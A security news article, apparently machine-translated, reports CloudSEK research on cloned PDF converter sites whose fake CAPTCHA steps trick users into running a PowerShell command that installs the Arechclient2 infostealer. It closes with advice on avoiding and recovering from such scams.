- False PDF converters deceive users with cloned sites and false Captchas
- The PowerShell command installs malicious software that steal the browser and cryptographic wallet data
- Attackers use realistic conceptions and social engineering to avoid detection
Cybercriminals use false PDF converters to install powerful malware on victims’ systems, experts warned.
Cloudsek’s research has found attackers cloning popular file conversion websites like PDFCandy.com – Reproducing its logo and brand elements – to encourage users to download malware.
Cloudsek says that these false sites seem almost identical to the real ones. When someone tries to convert a file, the page displays a false loading screen, then invites a CAPTCHA verification. Instead of simply confirming that the user is human, this step leads to an instruction to execute a PowerShell command. Depending on the command downloads a ZIP file containing malicious software known as Arechclient2, part of the family of sectoprat information thieves.
Collection of personal data, and worse
Malware uses a number of hidden methods to infect the system. It generates normal Windows processes to hide its activity and begins to collect browser passwords, crypto portfolio information and other sensitive data. Once malware is active, it can calmly send stolen information to attackers, reports Cloudsek.
The FBI has already warned that online file converters are becoming a popular means for criminals to broadcast their malware. Cloudsek’s research shows that attackers improve their methods, intelligently mixing realistic websites with social engineering tips in order to reduce user defenses.
Online tools are part of daily work and personal life, it is important to know how to avoid these threats.
How to stay safe
The best way to protect yourself is to avoid clicking on random search results for online file converters. Always visit known official websites directly.
In addition to that, always check the address of the website for small spelling changes that could be easy to miss.
For a good starting point, see our overview of the best PDF publishers and the best free PDF publishers. We also recommend the best Adobe Acrobat alternatives.
Staying cautious when downloading online documents can stop many of these attacks before starting.
Keep your antivirus software up to date (you do it anyway, right?) And scan all the downloaded files before opening them. The installation of browser extensions that block suspect or dangerous sites can also help.
If a website asks you to run PowerShell commands or download additional files after downloading a document, close the page immediately.
Finally, if you think you were deceived, disconnect the internet device immediately, change all the important passwords from a safe device and inform your bank or service providers as soon as possible.
